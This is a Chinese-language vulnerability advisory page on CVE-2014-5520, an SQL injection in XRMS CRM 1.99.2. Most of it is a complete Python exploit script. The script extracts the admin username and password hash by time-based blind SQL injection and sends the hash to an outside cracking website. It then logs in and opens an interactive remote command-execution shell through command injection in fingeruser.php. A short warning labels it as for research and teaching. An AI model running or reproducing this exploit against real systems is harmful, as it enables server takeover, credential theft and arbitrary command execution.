首页 -> 安全研究
安全研究
安全漏洞
XRMS CRM '$_SESSION'变量SQL注入漏洞
发布日期:2014-08-27
更新日期:2014-11-05
受影响系统:
XRMS CRM XRMS CRM描述:
BUGTRAQ ID: 69446
CVE(CAN) ID: CVE-2014-5520
XRMS CRM 是一个用 PHP 开发的开源客户关系管理系统和销售团队自动化管理工具,该系统还具备商业智能、计算机语音呼叫集成和一个高级的插件体系。
XRMS CRM 1.99.2版本在实现上存在sql注入漏洞,远程攻击者通过plugins/webform/new-form.php的user_id参数,利用此漏洞可执行sql命令。
<*来源:Benjamin Harris
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
import urllib
import urllib2
import time
import sys
usercharac =
['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108,
109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122,
64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
print """ ____
/ __/_ ______ _ _ ___________ ___ _____
/ /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
/ __/ /_/ / /_/ / _> </ / / / / / / (__ )
/_/ \__,_/\__, (_)_/|_/_/ /_/ /_/ /_/____/
/_/
[+] fuq th3 w0rld, fuq ur m0m!\n"""
def usage():
print " [+] Info: Remote Command Execution via $_SESSION
poisoning to SQLi to RCE"
print " [+] Example:"
print " [+] python " + sys.argv[0] + " domain.to/xrms"
quit()
def sendhashaway(hash):
print " [+] Sending hash to icrackhash.com to be cracked."
data = None
headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash
+ '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' :
'XMLHttpRequest'}
url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
gh = urllib2.Request(url,data,headers)
gh2 = urllib2.urlopen(gh)
output = gh2.read()
plaintext =
getpositions(output,'<td><small><strong>','</strong>')
print " [-] Plaintext of hash: " +plaintext + "\n"
return plaintext
def username(length):
length = length + 1
duser = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT
1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM
users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class
LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req,
fp, code, msg, headers):
infourl =
urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 +
str(userascii[f]) + payload3
data =
urllib.urlencode([('user_id',payload)])
url =
'http://'+domain+'/plugins/webform/new-form.php'
opener =
urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 =
str(cookie1).find('PHPSESSID')
cookie2pos2 =
str(cookie1).find("\n",cookie2pos1)
line =
str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url =
'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found.
Character is: " + usercharac[f]
duser.append(usercharac[f])
found = 1
return duser
def getusernamelength():
found = 0
i = 1
payload1 = "1) UNION ALL SELECT
1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM
users-- -"
while (found != 1):
class
LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg,
headers):
infourl = urllib2.addinfourl(fp,
headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2
data = urllib.urlencode([('user_id',payload)])
url = 'http://'+domain+'/plugins/webform/new-form.php'
opener = urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 = str(cookie1).find('PHPSESSID')
cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url =
'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Length found at position: " + str(i)
found = 1
length = i
return length
i = i + 1
def password(length):
length = length + 1
dpassword = []
#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
found = 0
i = 1
payload1 = "1) UNION ALL SELECT
1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
payload2 = ",1)=CHAR("
payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM
users-- -"
for i in range(1,length):
found = 0
while(found != 1):
for f in range(0,len(userascii)):
class
LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
def http_error_302(self, req,
fp, code, msg, headers):
infourl =
urllib2.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
class HeadRequest(urllib2.Request):
def get_method(self):
return "POST"
payload = payload1 + str(i) + payload2 +
str(userascii[f]) + payload3
data =
urllib.urlencode([('user_id',payload)])
url =
'http://'+domain+'/plugins/webform/new-form.php'
opener =
urllib2.build_opener(LeHTTPRedirectHandler)
req = HeadRequest(url,data)
prepare = opener.open(req)
cookie1 = prepare.info()
cookie2pos1 =
str(cookie1).find('PHPSESSID')
cookie2pos2 =
str(cookie1).find("\n",cookie2pos1)
line =
str(cookie1)[cookie2pos1:cookie2pos2 - 9]
line = 'XRMS' + line[9:]
url =
'http://'+domain+'/plugins/useradmin/fingeruser.php'
headers = { 'Cookie' : line }
data = None
start = time.time()
get = urllib2.Request(url,data,headers)
get.get_method = lambda: 'HEAD'
try:
execute = urllib2.urlopen(get)
except:
pass
elapsed = (time.time() - start)
if(elapsed > 1):
print " Character found.
Character is: " + usercharac[f]
dpassword.append(usercharac[f])
found = 1
return dpassword
def login(domain,user,password):
cookie = "XRMS=iseeurgettinown4d"
url = 'http://'+domain+'/login-2.php'
headers = { 'Cookie' : cookie }
data =
urllib.urlencode([('username',user),('password',password)])
a1 = urllib2.Request(url,data,headers)
a2 = urllib2.urlopen(a1)
output = a2.read()
if output.find('PEAR.php') > 0:
print " [+] Logged In"
def commandexec(domain,command):
cookie = "XRMS=iseeurgettinown4d"
cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo
'14x0';",None)])
headers = { 'Cookie' : cookie }
data = None
url =
'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
b1 = urllib2.Request(url,data,headers)
b2 = urllib2.urlopen(a1)
output = b2.read()
first = output.find('0x41') + 4
last = output.find('14x0') - 4
return output[first:last]
banner()
if len(sys.argv) < 2:
usage()
domain = sys.argv[1]
print " [+] Grabbing username length"
length = getusernamelength()
print " [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print " [+] Grabbing password hash"
tmppass = password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print " [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
cmd = raw_input(' [+] Run a command: ')
if cmd == 'quit':
print " [-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print " [+] "+ commandexec(domain,cmd)
建议:
厂商补丁:
XRMS CRM
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/xrms/
浏览次数:1587
严重程度:0(网友投票)
绿盟科技给您安全的保障